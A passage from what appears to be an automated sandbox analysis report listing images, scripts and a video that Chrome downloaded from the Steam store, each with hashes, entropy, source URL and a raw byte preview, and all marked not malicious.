        SHA-256:316048C2D853A77D174D425B603ED3DE3CAF17F0984326A533039F069EF7E928
        SHA-512:C59FA23AFB2B68A19766CCCDB0A14E3BD7D6C0D94F1D5B95056C78B79ADE07582939AC7F7E20E4903A2B3B5E7C56D02351EBC8BCC48D3FD9C82CBBD8E17E3302
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................>.........................!.1.."AQ.a2q...#B..R.....3br$c..%C.................................7......................!..1.A."Qa2q.......B..#Rb..r$3.............?....m[t.L\:........_.Q}...:....xdb.R.....q.%z......Y.....%...0.J...G..}..H.nOs...C..E...O..v.._i$..I&t.\....a.f.[.T_.\.<.2.........]C..........}Li..._..;..*..kjf....*&b.K!.;..'\i%....8...6J.v..N.:H...g*..*(.....(....Z...]...8.n..4.......Snh.#.P....*....JV3..KN.hi.(.............w'R.@.>....@.:08BZ.... .>.i.4^xV.D...7H\....3.k.e).C...7..^...).*.m..J.V..:).;....w...?-U-.Z.I..E<............Zw.T&ak.wE..B...c.d.w..W..gGh....2E.d-.v...{.,..)R0Go}.$....8.A.).B...K18..I..I..:....!..n..:D'o.....o......d.'..........d])].??.C.a.)%.....'..1)#.3...T{H.1!P1.)V.....}..e..5L..eE.f>.jH`|...,.....<G..W..9......@.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1 x 1
        Category:dropped
        Size (bytes):43
        Entropy (8bit):3.0314906788435274
        Encrypted:false
        SSDEEP:3:CUkwltxlHh/:P/
        MD5:325472601571F31E1BF00674C368D335
        SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
        SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
        SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
        Malicious:false
        Reputation:low
        Preview:GIF89a.............!.......,...........D..;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7931
        Entropy (8bit):7.939949319895233
        Encrypted:false
        SSDEEP:192:orfglKJf0V+BMybv5jY9Qn6mNejBfzLySxTIhzcq/67VmcS:qglK5hM+B56IejRzLtIh4q/67YcS
        MD5:A502727A2861688F8C755CB6A6D85562
        SHA1:96309F68A7960F5590677C72B7D17E26079351B8
        SHA-256:6ACD4D1D6F14F94012F92C702890A404E879755632A0EFC8DED206990FAAEB71
        SHA-512:46A50D53716789EFF2797EBEE508F47C5C6AABAF706D1A07D2D2F2489E29D0613FDCA8CDEE60A7CB991055A14727F60EFD51A2254A8CBE143191FC023B76A429
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/236390/capsule_184x69.jpg?t=1713793346
        Preview:......JFIF.............C....................................................................C.......................................................................E.............................................J...........................!.1."A..Q..#23aq..B...$...%(45CRbct.def...................................../......................!.."1.AQ2a#3B..q....R..............?.2..V.q.u:.I....m..@R...U..A.s......:....@k#W..z.....a.;.|..%>.M...b;+..Y.S\.. .[8...%VJ.....RCV....MG**. z(_.G.L .BGM.*...E.'.w.>`.0E^;./.^&.J#..j..U..J... :....3.v[....Txm.T....A......LiG-T..S+.{..T....u(.7..Q..\.x.+`.Y.0u.:%F.).'z.Z....6?.I......7......./...Eh..[..Pc.......b..1..zz..W..jc..eP...}...1.Q.oaa~/....C."...3....G~;-6.T...)M...{\~..0..T.r_M...E-.S....TZ..*...kaf...;;>.T...(..>...S{w.h&.'.6..,7..hg\...e'k.T.}.!.J....R....{bFR4......6.}....B...c......q.@..F....(S.....'oZ.DM.%+R>./.o.....4..RE..#....\O.N.....+.W.-....[..NZ..J.1...i.x.#.KO)..R.........<`..`..lJ. J-....*D*._.)/..>
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 27 x 21, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1283
        Entropy (8bit):6.804522396238829
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVgy28yULyJ3Vey7uytbGKIg2NXxqa37SV:IwqQNn2xDWLJ3xXJKg2NXjK
        MD5:6FD845DB37342E49CAF9A1B3D1268EA4
        SHA1:E380BB0F718887BA15FA5A62E06C368F39095660
        SHA-256:2B5E58C85345DCB11D869C8033CA7B7EB00A15C73554A59B553045BDE1A94ABD
        SHA-512:83DBC8420F91AB206D66981D6763017169927E68545629BC22C1265A773546196A2EA67F91F95D6C0EB7035E689D4581A8BA3B3A3AC797D2AE6CA8A237BB51A6
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images//v6/icon_cluster_controls.png
        Preview:.PNG........IHDR...............%....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D0D315BC12A911E49EBED2AEC7E84312" xmpMM:DocumentID="xmp.did:D0D315BD12A911E49EBED2AEC7E84312"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0D315BA12A911E49EBED2AEC7E84312" stRef:documentID="xmp.did:D0D315BB12A911E49EBED2AEC7E84312"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......wIDATx...J.0..3...Z<..9....>......^[.=...>.{P..F/...i.5~Y'K(Im]....L3.d&)I)...|8.....B.`p..I..1>.......=.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):238328
        Entropy (8bit):7.987992499352493
        Encrypted:false
        SSDEEP:6144:PYkpKXRazWnn8dCjrGV2ToCRGlBR5qqSEmKZrir3cBcd5IyI8J8f9ek2/p7:PYkpXzWnpGYULBR5qqXmKZreJTRIl9eL
        MD5:E916B27C0E8B0C3D8F627154B140DE1C
        SHA1:C26A4D6A8F974AE7134D2FC5478CB3A7A51E7FFF
        SHA-256:8C6E8B2631C900B26818A5BB8D3390C080934AF0A9F2E95A48137ECB3C55F938
        SHA-512:0F4C78B18471A83615F2175C280E0994F3D5DFFB9F89DBCBD45384A69069AD18203916B8CB4D4D1EC6441E86BA50F0BCEA3FFF43192099B71CC715E69D832891
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/eurogamer.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:23:47+03:00" xmp:ModifyDate="2021-08-03T14:23:47+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:eb4bdb4e-d6ab-4544-be70-fee626437ece" xmpMM:DocumentID="adobe:docid:photoshop:1954406c-28a1-9743-9d7e-b74bba17eaf2" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (47627), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):272603
        Entropy (8bit):5.323269099414314
        Encrypted:false
        SSDEEP:6144:Z39mUZ8O4V8vSIrC3dmDKGL2FC2AINEgSZun53xBf9OJexuLWIQ1vfj5rLZgJxFx:Z39LZ8O4V85rGdmDKGL2FC2AINEgSZuS
        MD5:05866451B00D6E2B521021327B32BC55
        SHA1:C2502AF8EF8A01F42EB1A206484BADD8DA50E12D
        SHA-256:5D51CED5899203F1D57041C2B0BE8D35F45A339891069D473D5D1FE83ADB7F57
        SHA-512:FD9126276D19ED25E7D95E7E43A470A8ABF4D7A0149621500E783711514F495FB1E518DACA70FB55C1E0917A7B1C2211A39D4DC9F278092AD83D20C50BEC818F
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/shared_russian-json.js?contenthash=fb2565f4c3cd3fd02a99
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[9062],{66116:e=>{e.exports=JSON.parse('{"language":"russian","Steam_Platform":"Steam","Button_About":"..........","Button_Append":"............","Button_Back":".....","Button_Cancel":"......","Button_Close":".......","Button_Clone":"...........","Button_Confirm":"...........","Button_Copy":"..........","Button_Copied":"...........","Button_CopyClipboard":".......... . ..... ......","Button_CopyLink":"........... ......","Button_Continue":"..........","Button_Create":".......","Button_Delete":".......","Button_Discuss":"........","Button_Dismiss":"......","Button_Edit":"........","Button_L
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 244 x 212, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):3777
        Entropy (8bit):7.855078020337897
        Encrypted:false
        SSDEEP:96:W5Zsk8bb6l5qnCoghGfkm37QP00rqGDXrg/sG3vUx+Iocg2fkjGfkjky:W5H8o5qe0Mu7600WiXE/v3ve+Is2MjGm
        MD5:EABC76EB57FEAE44ADD7FAEAD028521E
        SHA1:4E3E53938FAD15661D2D046A868338841A95DB19
        SHA-256:FC9E6260A2706AE146282D77E67BC1B74688435F8912AB4C1932641EEC28BFFA
        SHA-512:5C6DA6EEEFDDF321C2BC7E39A134E0A3140A9F93AD1560B2E102EF60EC218C29AAE14ED344C79E25CC5493CD15551040D8C909DE28DCAB02034D787563104E07
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...cIDATx..._LTg...w.i........Vmk.6X....i..F..{...^..^4Mz..6ml..nb ]....e.a....v..)...a.E.).#..>.0.3g.Kww8/..'y.g........sf.....W.2.... ...4....@......@...h... ...4....@. ....@...h... ...4....@. ....@...h......2....P^^...sVEE....r..={f.K....I...F#R...g..vN..k...%.Oj..6...h.:"...0......K.E..G..."..@.x..w.*...'."_..A...L.r....I..W........^H...Q...:;..h4j.z..8..,..a/...w.Fm.Meg.C.a.|..w.....u.`.zM.U.=....4e...=.U.....[.h.z..j...Te.a..z...+RUR.8.N.u.INN..o?a........E...o}.#...._....Oc..=.Orr.&.!;;[=..3..q.....?H...0{.S._m.B..(.6.Rm.)...]..%....3..c..Dk.M..z.%.c..NTd...}..90..tj.v.#.L..M.t.uc.<>..3..;..:..G..9..I.....%.@.`..d....@...h.@. ...4`6...M.@'.n......I/z`5>>.K...X7Z.Z.....5.7..h+.N.h....gS...8...........@..Njj.}....'...{`...'T{....mmm'.t2....?V..=C.......=b......`|s.@'zC.N......."..>k...M......)...}....?.r...+z.x....JTII.....4.O_....s..?>W..?.O.....`...t{...r..Z
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 460x210, components 3
        Category:dropped
        Size (bytes):42384
        Entropy (8bit):7.964249802214873
        Encrypted:false
        SSDEEP:768:Do1ay3y5dnaBMFGW8t/fHF8pSAkTKKh51RlmkNeZS3DzWv/Dj/CwrbdoFLojxRRt:DoLy5saG/fHFtKKbUUDc7dtiqRqS
        MD5:B79DA7BD00E77BD7A9B725AD047B4B64
        SHA1:C0E007B7159F32C30867FFB4C64EE9BC2298C4F3
        SHA-256:3904B94F82509E8511A6F706CB5745D9C74B0CA57937360009798D315778CF9F
        SHA-512:CF7447D735B41DACA54471D575330E22AFA92F63C6E87E64808322448CE2C66E074EBE9E523473C339C10EDF52D2AF4AE65F2F16243BEDAD169C0A251004F56A
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C............................................................................"..........................................O.........................!..1A..Qa."q.2...#BR...$3Cbr.4S...%D.....'5Tcst.U....................................B........................!1.AQaq.."...2........#BR34br...$5Cs................?.....I.#.[.=....=u5.4...Gm......Z.a .7.....S.hW.r5..R5..'JP.F.4.)TWq...KQ..k.I.t....:CR ...u.TRv:.6..i.5mC......n...k* .ii......0@.X.g_Ru.}fR.....Y6GS.....V.Nu.6..[....v.+...^.c.....+.I..N..J.mk...J.1BkZB.u./.}d.3...v..W.......$.h9.....l}5.#.~c.,..!..G.2..R.F...;.K.NiI'.g.i......J.....V..J....T......v....u..]Gm<..BT..J.aOs......T..$S......J...HU..kS..zivi..S.s.z.b%'.dj<......'HSNK.O.p##X......Z1.k4.X...6jN.S.....4);.r$.^..T.`.....n.z.t.....k...,..r..{.8...^WM.N.....^3.....pR.P.#.b.V......8..+...N.CIY.5....T'..F...<q.0..G.c.uy.J..e....t.9..=..T.o..r...*H..g@.G......pq.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):4691
        Entropy (8bit):7.896187016017341
        Encrypted:false
        SSDEEP:96:vlSRFm47QOD2RGytTefvO7lR+eyvzWZmGd2Efic+a9q1jXeekxT6:YFxlD2dTCvOiA1XicvAzVkx6
        MD5:2DE40A77413386EDDBE1E4AD40917D67
        SHA1:A028E21F35C85C10B788779A701EB5D5DCC133C9
        SHA-256:31B4E36925F37803761B2F96414ABC0AF31081A3A3560AB509BC9492F2E359E4
        SHA-512:BA47FA0998A1EDB5B2CC324EB2BF2EC9F34392F18411C6839030997BFE4AA05E36AC5E3588B559AEEAC4A23140F7D8CA763C0BDF33C220666508E09DA74DF7F4
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................G.........................!.1..A"Qaq..#23...r..4B......$...%568bstu................................./......................!.1A.".23Qqa......C................?...d........GQ#C$..X..q....Oa..lj=.h...V]..wY.T.J..O..T...u..#..$`p.9."...O3........v...%m...:TH..0.....d..3..uTB....f.?G|3..a..nXU.Z.E....K.t."^....<.5.....K..&u.Y.L.T..X...8d'.?....&J.srb.......v........,......br...q..y.....^?)1#..I.73.n7...R.:..i..P..%.p.....s... .Z.G...1......q..Z...;..9.)....+.........q.v.+*.q.(....X.r.....vM.-.k..CL...R7...u....y....!@.1..Y..\.S..2..J.=...]P.....q.[5B..-.U..(O z~..J.. .#bw...b..fP....n1.......{^.......G..GA. t..<.5....gI1..1..G7]..aV.........\0S.{M.......>.j)^...}.5.`.(..j.36$....?<~ZX.TT>..s..m.wn.u.uT2..ZQr......(...."1.........q;..;.R.z.Kex5......._s
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 8 x 8
        Category:downloaded
        Size (bytes):63
        Entropy (8bit):4.449633005985324
        Encrypted:false
        SSDEEP:3:CtMfhExlHr/lXYrP:OCP
        MD5:D1C5AA274C0F681D02317D33026E93D2
        SHA1:07CE7DDD50B6C56DC35A08128A161CDD78C08BE4
        SHA-256:563401248387CB3CF47D04E1DDA78508467889CE4EBB80D24A074E0C24A0183C
        SHA-512:5CDC105BA2500B00A8FAA70B89CA62C28F6BEC16B2198452AE408C65C316293E1512731F3EBBF811C83F3251D34C1EB5B6D8F7E1A3DCA6FB6943B8E858FDFB4D
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v5/ico_external_link.gif
        Preview:GIF89a.......MML...&&&...!.......,..............w....h!f.n....;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 236x236, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):66948
        Entropy (8bit):7.9687120896744235
        Encrypted:false
        SSDEEP:1536:hnkNUFegs9rirYXSyRYE61eamP2DZo8k47OQ5kg3:hnkNRgyG6S46122NoQ7OYV3
        MD5:2F7B23CD9C4010CB320A6E340FC55A8A
        SHA1:27A8B840862E53CC0F94CAD4A14E6AE32F5AA82C
        SHA-256:AC15E9A984422C025749F9B81028085D61903304D4CE641B4FF8068C27B5E7D3
        SHA-512:5FD43A82551653AE055FC2570E880391BE03B05824EACEF5942E83C55C6A1C6FEBD8E65313FA2D116D1E61CA8F0347603903C854D2DA0D92AAC0E170F986D445
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1830970/header.jpg?t=1715633298
        Preview:......JFIF.............C....................................................................C......................................................................................................................N..........................!..1A."Qa.2q.#B....R.3br.....$CS..%...4ct..&5DT....................................A.........................!1AQa.."q........2#BR....$3br.%4...C.S............?....)'..2.^..K....q.B....}.8)....D.........1u6.......Dr..f|~..U..)..e.m...........y...).$....H\.......l>..Ub,\.P.#.oCP.5.>._..*t%.X...6...:...S.X..76..1A#.~...0.LiR.Tj.h.....[f.....p..}..l......+J....x..W..KV$os......k.|XMzk...X.,..4..t...)........."...I;VA. ....;...S..~^..Z..<;.qJ..c.0\..*4Wi....JG..H.mw.~..j.s..q....J.....&"=#.j....7.e.' ....F..1U/..!P....+m=2+.h.!M.2.M.n..z..8_i.........H..u.(.^.s(S..5.#.ee.i..RH.A...w..l.4.ud..d..F.yF......._..D.....4H.R.d......qi.....0..i..7......p.cm..WQ.F.L.Q..:..[.2....<.[..... ...&(..hP3..A...n....SU..S...QJw5.j..W)...=.._.....U
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):3577
        Entropy (8bit):7.81935837646796
        Encrypted:false
        SSDEEP:96:jC0Jifi7iijTONHXysMOADWwRbNNC0EYuosbIqEB17AdA:jticHIiTLDx/C0EYIbIvv
        MD5:7A010186764D3A96D38F155827D2986B
        SHA1:6251C10C8C054E4C7038271257F8903E73105F42
        SHA-256:3029C050BC7D01095192D53355DF04381CF0EEB16D76D1BC4CE107BC1A60117E
        SHA-512:537C1B51156BF88BF71174028889298E20C5C29B9372A11F75EE0D9CC429165AB708DE397FE812D339C0F1EADD3A311AB8C6F0D8540D30AA86B87F91F62DBBFA
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/252490/capsule_184x69.jpg?t=1715591843
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E..............................................X..........................!..1.AQ...."aq...6TUu.........#$%'2457ERSct..(38BCDFVdr.....................................=..........................!1.AQa...."24RSq..........5.#Br..............?...p.0.0.os.+..+..70.....`....h.o@.z........I....+.h....z...........=3~E....M.V.#.8..v>..R.."....N.Nc.U..C.]h.w-.6....m....+....R.E.\G.}O.!M....+.......;...}O...NzRc...C.]c.......[..~c..y._.Kj+...f...>2...d....c......W.`..+......&.].V.....s..u...q2.s..l.a.......S...xJ...%B.^iH.....a.&]K,..]Y.P..(....q..Q......H...u...@...TgY..HML4M..aKI<...r.9Y.&..\.@....3.*..8..5....2.2..nQ.T...D..P*..+E2uhP.*L..#..k.;...S.*..wc..Rg.U.4.........z.<.........m......B...G..#..x/[.{...m.....zLq.=..f.<s.3$...L-H7x.t.~..6.~.c....n+......Nj....../q..Zu.%.I.ZP>...H$..[Ov1.0...1R
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):9665
        Entropy (8bit):5.235256973925393
        Encrypted:false
        SSDEEP:192:O1B9GLCVhFCD7ripKAzbjL6JYmqTMOZ1H71Rd+Z1QC:O1EiSe4A/VTMOX7rd+kC
        MD5:2778125D9B3BFFD6166044BA6EFBA9B6
        SHA1:059582750885CDC9D979EEDE457F9F8BB09213B9
        SHA-256:4261D9E674A7568E7B6EAA6BFB20A3BB41C5583E9BF50942244FB1A01C0364C6
        SHA-512:4053400C1FE0940521A8370B4773E216E1B9585472CC59D3A434D89B6753F2F21E1D6911787F432685710EDBDE98142DE7EA00C1EF20583BCDDE1B1597FCB543
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/broadcast_carousel.js?v=J3gSXZs7_9YW&l=english
        Preview:....GSteamBroadcasts = {....Init: function( fnFilterFunction, tagid, genreid, categoryid, maxBroadcasts, bAutoPlayingFeaturedBroadcast )...{....if ( tagid === undefined ) {.....tagid = 0;....}......if ( genreid === undefined ) {.....genreid = 0;....}......if( categoryid === undefined ) {.....categoryid = 0;....}......if ( maxBroadcasts === undefined ) {.....maxBroadcasts = 6;....}......if( bAutoPlayingFeaturedBroadcast === undefined ) {.....bAutoPlayingFeaturedBroadcast = false;....}......GSteamBroadcasts.m_fnFilterItemToDisplayFunction = fnFilterFunction;....GSteamBroadcasts.m_tagid = tagid;....GSteamBroadcasts.m_genreid = genreid;....GSteamBroadcasts.m_categoryid = categoryid;....GSteamBroadcasts.m_nMaxBroadcasts = maxBroadcasts;....GSteamBroadcasts.m_bAutoPlayingFeaturedBroadcast = bAutoPlayingFeaturedBroadcast;......// If we have zero maxBroadcast, it means we should be disable....if( GSteamBroadcasts.m_nMaxBroadcasts > 0 )....{.....GSteamBroadcasts.Render();....}...},.......Create
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):80072
        Entropy (8bit):7.973507439340328
        Encrypted:false
        SSDEEP:1536:Prhd7/7Y/iqT5DhWeBRZI9Phi19RXsI+QrfLGhSYCGK2nb8HVgBzol6b62:9qT5VWeBHkA19J5r7YzT8HWVoE
        MD5:03C0F2F494964592ABBA6929095D4091
        SHA1:EE8A081FE74466C37E520BBCD162E2C772AF8BA2
        SHA-256:5D0B1230197060E5AA942AF0A089CA7E747964589823B630AF7F868EEBE1F6F7
        SHA-512:ED66B0F30B8AE2404DEA62FAF8316279B2F76242DBA42664ED50AE1CCCE595A2C72EAB1915617DA4686937374FA3ABEDBB5736DC099367839ED6D22308730EE1
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/730/ss_13bb35638c0267759276f511ee97064773b37a51.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................M.........................!.1.AQ.."aq.2...#B...Rr..$34b...Cs...5..%6Dt..Sc..................................9........................!1A."Q.2a.q#B...3...R..C..$b...............?.b...K..lk...!h..5......!zul.{......8......A..!..=5.D..O].!......B...@.GHq...q.8.....v}5().....Nq....E*r..........g':.Ey@..~..".g.R./.......<j..v5.z..K?4.h..R.}.V...O.D*.*.A....D=.q.!..9.:t#!eQ.w...N5.....=.@0H.%.. 7.R.d.'.B.J.n...1..u.y<.H..;.v'.j...7.....c$..uk.]).7/'"$<.. s.A.|...[<..r|....Q...&.......B.p..q.F..D.5.>.. ....!..RO.R<m..F$d...Q.c.E......-.0%9N.E...Y+K8.4HW.$..q...4~....r...!.....z...\......F<K....ItYE....V.|....d....-..Gn5.4.-....w.KE.:W.m....%a...0.l~.........G1.Y~!....rO...u7p.....o.7.[|.$fw_.'..f..C...3E.z.......Xa..DC...../..ts?u..O..{..._..;......V....nvD
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):20054
        Entropy (8bit):7.97037734054312
        Encrypted:false
        SSDEEP:384:M3sUMbUIvR5x2+sn4f/iGbqF0mQFFbVZFwEk2UWA9Fc6+ZCO4cCw1qr+Z5K:P1bZvbx9snEiWNmaFbiJ2UN26cCqa+ZM
        MD5:DC1683C0E02EED41EC5E352E5B965FCB
        SHA1:A294519F48CE7A486ABD9E6F45A703497E2A0632
        SHA-256:853E44B712AD08C4ACD5B62B85D920ED8ECD504A58450704BB5E2A31A01111F2
        SHA-512:2FB4BCC7FAA9399BD1EC382AF3DDEAE8D9A39FF15EC3D9A32F5965875183A8429F0A4434814859C8B4D74AFE3C967CD519DEC31EFE4D3B40BFC95F94ECCA42FB
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1012790/header_292x136.jpg?t=1716299172
        Preview:......JFIF.............C....................................................................C.........................................................................$.............................................K...........................!1..AQ."aq.2..#B.......3Rbr..$4..%CD...&Efs...................................8.......................!1.A.."Qaq.2........#.R3B4br...............?...7Q......R.0?....3.6..".Z.......(..=..8....p:.`...o.|..3.>&..vu.....S.m......$..&.T.X.o..(ebB!V...*...:..d.=...n4.........).7*.....\g.N;.Q.t..;....h.7;...d...W$e...Q....9rz.]swh]nI....Ivk..tp..V|=.^wY%X.y..P~`.)..t.L...El)..ZVn-..(g.. .....FYt(..X..r....3......9..rax[.>RM.....]......X...v.l.r...L....&...8./.I..d..g..q.z....7RC..X5.....A.I*3..q.5.*r]...Nz.=.Ev..KS..M..U.... .}).I..v.c...hm.L..W........../p.....;P....T..f...qWP....@:...M.lfH..mY.j..U.....\......9':|....V.z......~......S.N;&L.,...U.H.R..^l...N5.t..s..+}.h...>...q.uj.63s`..V&.K...:...eK..oJ.p.M
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.999640764681305
        Encrypted:true
        SSDEEP:24576:FVx7XDRcr2RTO+C0Wm95nNXMtfaH8r9exQ/Mv5OQCPe:JPRN3k4+CH8BZ/qODG
        MD5:4FF77D658E2DC2955FFCECC22698CFD3
        SHA1:C59F852203063907E6B6B8749EF490B7EC29BCCD
        SHA-256:96C267E297440BA36CA57ACA33FE7490AC4B9118C730E95D7300E3CD6AAF4C42
        SHA-512:CCB9E4CC64266E185A2A71D8F35F948DFE312C1F424AC058A9B7B1DFA59AED44642D4B7CA3D524B84B34D7972C6C5DAA61669B33D443BA916E74E94FF4BE4AF0
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/frontpage/eb193c51e2c473096f72216e/webm_page_bg_english.webm?t=1716506545:2f77e586e7d3b8:1
        Preview:.......BJ...J.pTh.....).......d1.....>|S.R.!hM........$.F9i.>.+.o....q.p.......*h..(._.4q...3.....7.[."...E.{B..[.ad....G\.gI..bp.....u......R..L.....y.WG..W..........B....]X..y%.(...&..=.y...%.3w.H..xu....6...9.d...!wjk......5)\...'9+;!..J...7c:W.....;.N^.hD*..v...B...G...,.jkb%....O.[.....[kF5.J.].L.LHI.T.L..."k....t...t...8.0.........M....)ny.9..n.dQ.....{....uJ.C...Q..5..J;.........K..*..JYlP.T5q.De.....B[.......2hA........`..em..Z...........@...;S..NP3.^..*.7.ix7.a..a..:..k.\.]<.g..D..[...D..i.gx13#.w...G..)4.igr(.u.2v|...A..?].E@`........w..-.i+...V...J..e....c{4\..!<2...../pE.....,........P.9...J..r.%......."...*.{.B..P..;JL..(.S4......LG.].,..*..W.8...2.H.c..B.q.2.AK.(a..~!Eb..%w9.=..e.V.3#."..#..!.!7a...a.......y?'...>........=4p....-.1,....s..w..u......"....L^."U....t..<..(...VY.L.z.I\.dQ".>..X._..)...t..MH./...'[....8..oW.H.[..m..0...0....R.F......Zn..:~B.........%.E`.o..Jp......@......L...?Q..:#.CZ..../.!D(....%wjgF].M.(FU..q
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 616x353, components 3
        Category:downloaded
        Size (bytes):112570
        Entropy (8bit):7.97948429289081
        Encrypted:false
        SSDEEP:3072:nCmXKXxKlFsSxUHjwJEy8zlO411KuIYsfkhDy+HCEWa:pS4CSxC0JQzH1KuIYFWErd
        MD5:FA7379ECBA014C7116A37DDEAD385A3B
        SHA1:018159B840DEE28880341E6B9C385FF9BF704868
        SHA-256:4979E06220529972BEE2650B42DC9442A2A85312D134820449CD634B0A152C9D
        SHA-512:5549C016308E7CD32D68F43CF085DDC9C2C31E237C15B65296497CD9DC30B6C87F6C1AE963829D675280A9647BF607D562C6EF64612174BD3958570E02217868
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2479810/capsule_616x353.jpg?t=1714668079
